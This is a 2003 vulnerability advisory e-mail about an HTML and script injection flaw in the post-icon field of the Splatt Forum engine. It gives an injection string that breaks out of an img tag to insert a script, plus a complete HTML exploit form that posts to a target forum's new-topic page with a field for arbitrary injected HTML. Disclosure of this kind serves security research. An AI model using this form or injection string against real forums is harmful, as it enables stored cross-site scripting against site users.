The Splatt Forum engine allows html code insertion for the post icon form input.
6a997a7fd6c6056a6317e6c215a6608c822b8076ec2b127e14bf5b37bb4e7d46
From: "BlackAngels" <blangels@libero.it>
To: <submissions@packetstormsecurity.org>
Subject: Splatt Forum html injection code in post icon
Date: Wed, 16 Jul 2003 20:36:59 +0200
[ Vulnerability description]
Any user can inject html code when create a new post.
The bug is in the post icon :
<img src=3D"icon.gif" etc.>
If you create a personalized form with this code:
icon.gif"><script>alert('bug');<script><anytag=3D"
the final code of the post icon is :
<imgsrc=3D"icon.gif"><script>alert('bug');<script><a=
nytag=3D"" etc.>
[ Exploit's code ]
<html>
<body>
<script>
<!-- Modify here -->
var =
address=3D'http://TargetURL/gate.html?mop=3Dmodload&name=3DForums&file=3D=
newtopic';
</script>=20
<!-- Exploit form -->
<script>
document.write("<form action=3D"+address+" method=3D'post' =
name=3D'coolsus'>");
</script>
Numero forum: <input type=3Dtext name=3Dforum value=3D1 size=3D3><br>
Username: <input CLASS=3Dtextbox TYPE=3D"TEXT" NAME=3D"username" =
SIZE=3D"25" MAXLENGTH=3D"40"><br>
Password: <input CLASS=3Dtextbox TYPE=3D"PASSWORD" NAME=3D"password" =
SIZE=3D"25" MAXLENGTH=3D"25"><br>
Soggetto: <input CLASS=3Dtextbox TYPE=3D"TEXT" NAME=3D"subject" =
SIZE=3D"75" MAXLENGTH=3D"75"><br>
Messaggio:<br><textarea name=3D"message" rows=3D"10" cols=3D"75" =
wrap=3D"VIRTUAL"></textarea><br>
<input type=3Dhidden name=3Dbbcode value=3D0>
<input type=3Dhidden name=3Dsmile value=3D0>
<input type=3Dhidden name=3Dnotify value=3D0>
<b>Inject code:</b> <input type=3Dtext name=3Dimage_subject =
value=3D'icon1.gif">HTML CODE<!-- "' size=3D100><br>
<input type=3D"submit" name=3D"submit" value=3DInvia class=3D"Button">
</form>
</body>
</html>=20
-------------------------------------------------------------------------=
---
Vulnerability and exploit by Nemesis
BlackAngels [ Security Research and Development ]
-------------------------------------------------------------------------=
---